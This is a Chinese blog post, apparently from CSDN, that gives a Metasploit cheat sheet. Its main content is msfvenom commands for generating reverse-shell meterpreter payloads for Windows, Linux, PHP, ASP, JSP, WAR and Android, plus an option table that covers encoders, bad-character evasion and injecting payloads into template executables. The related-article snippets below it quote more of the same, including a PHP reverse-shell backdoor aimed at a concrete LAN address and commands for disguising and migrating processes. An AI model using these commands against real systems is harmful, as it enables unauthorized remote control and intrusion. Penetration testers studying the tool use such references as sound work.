MSF命令大全

最新推荐文章于 2024-05-13 10:26:43 发布
最新推荐文章于 2024-05-13 10:26:43 发布
阅读量5.6k 收藏 49
点赞数 6
分类专栏: web安全 小白 渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32108547/article/details/109192283
版权

0x00 Payload生成

Windows/Linux

Windows:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名

Web

PHP:
msfvenom -p php/meterpreter_reverse_tcp lhost=[你的IP] lport=[端口] -f raw > 保存路径/文件名.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f asp > 保存路径/文件名.asp JSP: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f raw > 保存路径/文件名.jsp WAR: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f war > 保存路径/文件名.war

Android

Android:
msfvenom -p android/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -o 保存路径/文件名.apk

0x01 msfvenom命令参数

 1 Options:
 2     -p, --payload    <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定
 3     -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
 4     -n, --nopsled    <length>        为payload预先指定一个NOP滑动长度
 5     -f, --format     <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
 6     -e, --encoder    [encoder]       指定需要使用的encoder(编码器)
 7     -a, --arch       <architecture>  指定payload的目标架构
 8         --platform   <platform>      指定payload的目标平台
 9     -s, --space      <length>        设定有效攻击荷载的最大长度
10     -b, --bad-chars  <list>          设定规避字符集,比如: &#039;\x00\xff&#039;
11     -i, --iterations <count>         指定payload的编码次数
12     -c, --add-code   <path>          指定一个附加的win32 shellcode文件
13     -x, --template   <path>          指定一个自定义的可执行文件作为模板
14     -k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行
15         --payload-options            列举payload的标准选项
16     -o, --out   <path>               保存payload
17     -v, --var-name <name>            指定一个自定义的变量,以确定输出格式
18         --shellest                   最小化生成payload
19     -h, --help                       查看帮助选项
20         --help-formats               查看msf支持的输出格式列表

最低0.47元/天 解锁文章
L_lemo004
关注
  • 6
    点赞
  • 49
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF内网渗透实战
hackzkaq的博客
05-17 3801
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
Metasploit Framework命令汇总
weixin_34351321的博客
06-08 205
Metasploit Framework命令汇总 2010-11-07 01:49 Metasploit Framework命令汇总 一、msfconsole ? 帮助菜单 back 从当前环境返回...
msf基本使用,基本命令说明
cjh12340826的博客
07-10 2303
xxx_nonx_tcp : no execute 或 win7 (NX是应用在cpu的一种可以防止缓冲区溢出的技术)shell_reverse_tcp:反向连接到攻击者主机并创建一个shell。reverse_http: 通过HTTP隧道通信并创建一个新用户添加到管理组。shell_find_tag: 在已建立的连接上创建一个shell。add_user :创建一个新用户添加到管理组。bind_tcp : 监听一个tcp连接。21,version显示一个控制台版本。7,info 显示一个模块的详细信息。
【工具使用】——Metasploit(MSF)使用详解(超详细),2024年最新腾讯网络安全面试必问_msf关闭杀软
最新发布
2401_84972980的博客
05-13 1051
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
msf命令
qq_52469895的博客
05-19 2147
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
MSF 详解
m0_72125469的博客
05-19 4462
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。
metasploit framework 笔记 | msf5 使用技巧
VI___
02-02 5225
一、典型的攻击步骤 ① use exploit/操作系统类型/漏洞类型/具体漏洞模块名称 ——指定要使用漏洞利用模块 ② set SRVHOST 攻击源IP ③ set PAYLOAD windows/meterpreter/reverse_tcp ——设置攻击载荷,也就是 shellcode,可以用来接收反弹的shell ④ set LHOST 被攻击者IP ⑤ expl...
msf命令全集
06-05
MSF 命令全集 MSF(Metasploit Framework)是一款功能强大且功能丰富的渗透测试工具,提供了多种命令来实现各种功能。下面是 MSF 命令全集的详细解释: 基本命令 * `?`:帮助菜单,显示所有可用的命令 * `back`:...
MSF终端命令.txt
02-24
msf的一些终端命令
msf命令汇总
06-21
msf的一些实用命令 希望有用 尤其是对初学者帮助会很大
MSF技术总结
05-07
MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 MSF 由三个主要...
浅谈MSF渗透测试
02-24
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架...下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
MSF常用命令|Metasploit术语
qq_60115503的博客
04-20 1236
渗透攻击(Exploit) 渗透攻击是指由攻击者或者渗透测试者利用系统,应用或服务中的安全漏洞,所进行的攻击行为 流行的攻击技术包括,缓冲区溢出,web应用程序漏洞攻击,以及利用配置错误等,渗透攻击是指由攻击者或者渗透测试者利用系统,应用或服务中的安全漏洞,所进行的攻击行为,流行的攻击技术包括:缓冲区溢出,Web应用程序漏洞攻击,以及利用配置错误等 攻击载荷(Payload) 攻击载荷是我们期望目标系统在被渗透攻击后而执行的代码,在MSF框架中可...
MSF系列——简介及基本命令使用
weixin_49340699的博客
01-11 1836
MSF系列——简介及基本命令使用MSF简介模块常用命令介绍 MSF简介 Metasploi是一个免费的、可下载的框架, 通过它可以很容易地 获取、开发并对计算机软件漏洞实施攻击。它本身 附带数百个 已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasplit团队一
MSF后渗透攻击
weixin_43749601的博客
03-06 1701
进程迁移 刚获得shell时,该shell是极其脆弱和容易受到攻击的。所以第一步就是要移动这个shell,把它和目标机中的一个稳定的进程绑定在一块。 1.ps命令获取目标机正在运行的进程。 2.getpid获得shell的进程号(PID) 3.通过进程号得知该shell的进程名。 4.输入migrate + 被绑定进程的PID 5.再次输出getpid,发现进程号已经变成需要迁移的进程号,进程迁移成功 系统命令 shell连接稳定之后,开始收集系统信息 1.sysinfo命令查看目标机的系统信息 2.rou
MSF常用命令
L_lemo004的博客
10-20 2586
Msf是kali下的这款强劲的专用工具,开源系统的网络安全问题测试工具前渗入后渗入环节都用获得,只有還是后渗入环节用的多。 Msf用途大概就是说exploit进攻,cve进攻,远程控制木马病毒进攻运用。 Msfconsole 开启msf Msfconsole -h 协助选择项 Banner 用以查询metasploit的版本信息,运用控制模块总数、payload总数 控制模块详细介绍: Exploits 渗入进攻控制模块 主要用于进攻方式 Auxiliary 輔助控制模块 主要用于信息内容搜集 Payloa
MSF建立webshell后门,并监听端口建立session连接
热门推荐
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R &gt; test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx的博客
11-04 3341
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 四,过程: 1,查看帮助 命令: root# msfvenom -h 结果: 2,生成
kali msf命令
11-09
ali Linux是一款专门用于渗透测试和网络安全评估的Linux发行版,而Metasploit Framework(MSF)是一款广泛使用的开源渗透测试框架。下面是一些常用的Kali MSF命令: 1. 启动MSF控制台:msfconsole 2. 搜索漏洞:search <漏洞名称> 3. 选择一个漏洞:use <漏洞模块> 4. 设置漏洞参数:set <参数名称> <参数值> 5. 查看当前设置的参数:show options 6. 运行漏洞攻击:exploit 7. 查看已经获取的会话:sessions 8. 选择一个会话:sessions -i <会话ID> 9. 查看会话信息:sysinfo 10. 执行命令:shell <命令>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值